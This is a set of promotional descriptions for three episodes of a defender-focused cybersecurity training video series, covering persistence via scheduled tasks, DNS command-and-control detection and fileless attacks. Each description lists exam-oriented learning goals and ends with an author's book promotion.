EPISODE 10 — THE SCHEDULED TASK THAT RECREATED ITSELF

Security+ Domain 4 concepts • CySA+ threat analytics • SOC persistence detection

Persistence is the attacker’s greatest weapon. And one of the stealthiest forms of persistence is a scheduled task that… won’t stay deleted.

Defenders remove it. Minutes later, it reappears. Delete again. It returns again.

This isn’t a misconfiguration. It’s a self-healing persistence loop — designed to survive every defensive attempt.

In this cinematic scenario, you’ll see how attackers build auto-rebuilding tasks, how fileless payloads hide in memory, and how SOC analysts investigate the subtle indicators surrounding persistence mechanisms.

What you’ll learn:

• How attackers create scheduled tasks that auto-rebuild

• How fileless scripts persist invisibly in memory

• Why scheduled tasks are powerful detection points

• How C2 frameworks use heartbeat-style DNS traffic

• How to safely contain persistence mechanisms

• How task creation logs reveal credential misuse

• How real-world SOC teams escalate persistence findings

Security Operations Skills Covered:

✔ Automation & orchestration visibility

✔ Fileless execution & in-memory persistence

✔ Task scheduler abuse

✔ DNS-based command-and-control patterns

✔ Behavioral EDR/XDR investigation

✔ Incident response workflow for persistence

✔ Threat hunting signals

This scenario reinforces key concepts from:

Security+ (SY0-701) — Automation, persistence mechanisms, task scheduler abuse, detection & response

CySA+ (CS0-003) — Behavioral analytics, fileless attack patterns, DNS-based C2, credential misuse

Designed for exam learners and real SOC analysts.

Ideal for:

— Security+ learners

— CySA+ learners

— SOC Tier 1 analysts

— Threat hunters

— Blue team defenders

— Anyone learning how persistence works in the real world

Cinematic. Practical. Exam-relevant. This is how defenders recognize threats that refuse to disappear.

New episodes weekly.

Explore the works of M.G. Vance on Amazon — including Security+, CySA+, CISA, CISM, CRISC, and The Breach Nobody Saw Coming titles.

Amazon Author Page: https://www.amazon.com/stores/author/B0FX7TZSV4/

CyberLex Learning — Forge the Defender.

EPISODE 9 — THE DNS QUERY THAT DIDN’T MATCH ANY PATTERN Security+ Domain 4 concepts • CySA+ network analytics • SOC DNS anomaly detection

DNS is one of the most misunderstood — and most exploited — protocols in cybersecurity. Attackers use it for stealthy command-and-control, tunneling, and low-and-slow exfiltration because most environments treat DNS as “just infrastructure,” not a high-signal detection source.

In this cinematic scenario, you’ll learn how a single strange DNS query becomes the clue that exposes a hidden attacker channel.

What you’ll learn:

• How DNS tunneling and C2 communication work

• Why random or structured-looking domains signal early compromise

• How SOC analysts correlate DNS telemetry with endpoint behavior

• How attackers use domain generation algorithms (DGAs)

• How unknown domains differ from known-malicious ones

• How to isolate endpoints beaconing through DNS

• How passive DNS and DPI support threat hunting

Security Operations Skills Covered:

✔ Network monitoring

✔ SIEM correlation

✔ DNS analysis

✔ Anomaly detection

✔ C2 discovery

✔ Incident response actions

✔ Threat hunting fundamentals

This scenario reinforces key concepts from:

Security+ (SY0-701) — Network monitoring, DNS analysis, anomaly detection

CySA+ (CS0-003) — DNS-based threat detection, DGA identification, C2 behavior analytics

Designed for exam learners and working defenders.

Ideal for:

— Security+ learners

— CySA+ candidates

— SOC Tier 1 analysts

— Threat hunters

— Anyone learning practical detection techniques

This episode blends exam clarity with real-world intuition — teaching DNS detection the way defenders actually experience it.

New episodes weekly.

Explore the works of M.G. Vance on Amazon — including Security+, CySA+, CISA, CISM, CRISC, and The Breach Nobody Saw Coming titles.

Amazon Author Page: https://www.amazon.com/stores/author/B0FX7TZSV4/

CyberLex Learning — Forge the Defender.

EPISODE 8 — THE PROCESS THAT HID IN MEMORY Security+ Domain 4 concepts • CySA+ behavioral analytics • SOC fileless attack detection

Modern attackers don’t always drop files. Sometimes the entire attack happens in memory — invisible to antivirus, bypassing traditional scans, and relying on stealth to stay ahead of the SOC.

In this cinematic scenario, you’ll see how defenders detect fileless techniques through subtle signals: unusual PowerShell behavior, reflective loading, credential access attempts, and processes that should never run the way they’re running.

What you’ll learn:

• How fileless attacks operate without touching disk • Why memory-only processes are early indicators of compromise • How EDR/XDR telemetry exposes reflective loading & AMSI bypass attempts • How attackers attempt credential access through LSASS • What suspicious PowerShell behavior looks like • How to isolate, contain, and escalate memory-resident threats

Security Operations Skills Covered:

✔ EDR/XDR telemetry interpretation

✔ Memory analysis fundamentals

✔ Fileless malware techniques

✔ Behavioral & heuristic detection

✔ Credential theft monitoring

✔ Threat hunting signals

✔ Incident response workflow for in-memory attacks

This scenario reinforces key concepts from:

Security+ (SY0-701) — EDR/XDR, behavioral detection, malware identification, IR workflows

CySA+ (CS0-003) — Memory-based attacks, credential access attempts, advanced detection analytics

Designed to support both exam learners and working SOC analysts.

Ideal for:

— Security+ learners — CySA+ learners — SOC Tier 1 analysts — Blue team defenders — Incident responders — Anyone learning how modern attackers avoid traditional AV

Short. Cinematic. Practical. A real-world look into attacks designed to stay invisible.

New episodes weekly.

Explore the works of M.G. Vance on Amazon — including Security+, CySA+, CISA, CISM, CRISC, and The Breach Nobody Saw Coming titles.

Amazon Author Page: https://www.amazon.com/stores/author/B0FX7TZSV4/

CyberLex Learning — Forge the Defender.